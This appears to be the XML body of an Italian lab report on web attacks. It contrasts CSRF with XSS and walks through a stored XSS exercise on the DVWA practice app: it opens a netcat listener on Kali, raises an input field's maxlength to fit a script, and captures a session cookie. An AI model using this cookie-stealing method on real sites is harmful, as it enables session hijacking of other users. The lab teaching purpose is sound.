          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CSRF).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009218C8" w:rsidRPr="00CB6966" w:rsidRDefault="00CB6966" w:rsidP="009218C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attacco CSRF è una vulnerabilità di sicurezza delle applicazioni web in cui un attaccante sfrutta </w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">il fatto che il sito web </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>accetta richieste da un utente senza verificare se la richiesta è stata intenzionalmente iniziata dall'utente stesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB6966" w:rsidRPr="00D15E52" w:rsidRDefault="00CB6966" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Mentre gli attacchi XSS vanno ad ingannare l‘utente</w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (la colpa è del programmatore che non filtra l’input)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> che deve </w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">cliccare </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6966">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>su un link malevolo, gli attacchi CSRF vanno ad ingannare il server che va a leggere i cookie</w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ed in questo caso la colpa non è di nessuno).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C552B" w:rsidRDefault="003C552B" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009218C8" w:rsidRDefault="009218C8" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6966" w:rsidRDefault="00CF5284" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Proviamo adesso lo stesso script ma su un tipo di attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009218C8">
        <w:t xml:space="preserve">; ovvero un tipo di attacco “persistente” in quanto </w:t>
      </w:r>
      <w:r w:rsidR="009218C8" w:rsidRPr="009218C8">
        <w:t xml:space="preserve">il codice viene eseguito ogni volta che un </w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:t xml:space="preserve">utente </w:t>
      </w:r>
      <w:r w:rsidR="009218C8" w:rsidRPr="009218C8">
        <w:t xml:space="preserve">visita la pagina </w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:t>“avvelenata”, per cui anche se si ricarica la pagina, lo script rimane. In questo caso perciò si va ad infettare il database del sito web, il quale salva lo script malevolo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009218C8" w:rsidRDefault="009218C8" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009218C8">
        <w:t xml:space="preserve">Gli attacchi XSS persistenti sono </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">più </w:t>
      </w:r>
      <w:r w:rsidRPr="009218C8">
        <w:t>pericolosi, in quanto con un singolo attacco si possono colpire diversi utenti d</w:t>
      </w:r>
      <w:r>
        <w:t>a una sola web app.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009218C8" w:rsidRDefault="009218C8" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF5284" w:rsidRDefault="00CF5284" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sempre da riga di comando su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, utilizziamo lo stesso comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l -p + porta in ascolto (12345);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6870" w:rsidRDefault="00CF5284" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">torniamo ora sulla nostra pagina DVWA e andiamo questa volta su XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5284" w:rsidRDefault="00CF5284" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Inseriamo lo stesso script di prima, ma notiamo c</w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>he</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non ci fa scrivere l’intero pezzo di codice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5284" w:rsidRDefault="00CF5284" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ispezionando la pagina HTML notiamo che nel DIV corrisponde</w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:t>nte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all’area dove andiamo ad inserire lo script c’è una lunghezza massima di 50 caratteri. In questo caso basterà cambiare il numero dei caratteri per poter inserire il nostro script: (per esempio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxlength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> da 50 a 250)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5284" w:rsidRDefault="00CF5284" w:rsidP="00D15E5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451498" cy="1498777"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6366613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61300" name="Immagine 6366613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94" cy="15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84" w:rsidRDefault="00CF5284" w:rsidP="00D15E5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546600" cy="1268819"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="16504474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47474" name="Immagine 16504474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13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84" w:rsidRDefault="00CF5284" w:rsidP="00D15E52">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF5284" w:rsidRDefault="00CF5284" w:rsidP="00D15E5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Una volta premuto su “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> gues</w:t>
      </w:r>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">tbook”, andiamo a verificare lo stato della nostra connessione su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009218C8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009218C8" w:rsidRDefault="009218C8" w:rsidP="00D15E5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295553" cy="2110761"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163946320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63201" name="Immagine 16394632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25" cy="21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C8" w:rsidRPr="003C552B" w:rsidRDefault="009218C8" w:rsidP="00D15E5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Anche in questo caso </w:t>
      </w:r>
      <w:r w:rsidR="005D6870">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ci esce come output il relativo cookie di sessione.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009218C8" w:rsidRPr="003C552B" w:rsidSect="001D6ACB">
      <w:footerReference w:type="even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24D4" w:rsidRDefault="000F24D4" w:rsidP="005D6870">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000F24D4" w:rsidRDefault="000F24D4" w:rsidP="005D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668741303"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="005D6870" w:rsidRDefault="005D6870" w:rsidP="004D3A2C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D6870" w:rsidRDefault="005D687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331062850"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="005D6870" w:rsidRDefault="005D6870" w:rsidP="004D3A2C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5D6870" w:rsidRDefault="005D687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24D4" w:rsidRDefault="000F24D4" w:rsidP="005D6870">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000F24D4" w:rsidRDefault="000F24D4" w:rsidP="005D6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46C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="475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3E1FD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6DE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B5B4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB5A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E09A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4538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A6060"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3454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F1DED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7640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14225"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="872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88815">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="309872959">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="70934599">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="796530306">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1249540496">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="788475592">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="556622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85"/>
    <w:rsid w:val="000F24D4"/>
    <w:rsid w:val="001D6ACB"/>
    <w:rsid w:val="00204626"/>
    <w:rsid w:val="00267A41"/>
    <w:rsid w:val="002D51B9"/>
    <w:rsid w:val="00367D83"/>
    <w:rsid w:val="003C552B"/>
    <w:rsid w:val="003F2C16"/>
    <w:rsid w:val="005D6870"/>
    <w:rsid w:val="00640BF5"/>
    <w:rsid w:val="00675204"/>
    <w:rsid w:val="00784C91"/>
    <w:rsid w:val="007C0B22"/>
    <w:rsid w:val="009218C8"/>
    <w:rsid w:val="009B0B88"/>
    <w:rsid w:val="00A33E96"/>
    <w:rsid w:val="00C71285"/>
    <w:rsid w:val="00C877AE"/>
    <w:rsid w:val="00CB6966"/>
    <w:rsid w:val="00CF5284"/>
    <w:rsid w:val="00D15E52"/>
    <w:rsid w:val="00EB2D1A"/>
    <w:rsid w:val="00F3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9D291"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{299ECB31-4F98-1C4C-84F7-A4E074F8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essagelistitem6a4fb">
    <w:name w:val="messagelistitem__6a4fb"/>
    <w:basedOn w:val="Normale"/>
    <w:rsid w:val="003F2C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3F2C16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F3408E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F340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40BF5"/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5D687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D6870"/>
  </w:style>
  <w:style w:type="character" w:styleId="Numeropagina">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D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2024-01-19T09:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-19T15:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>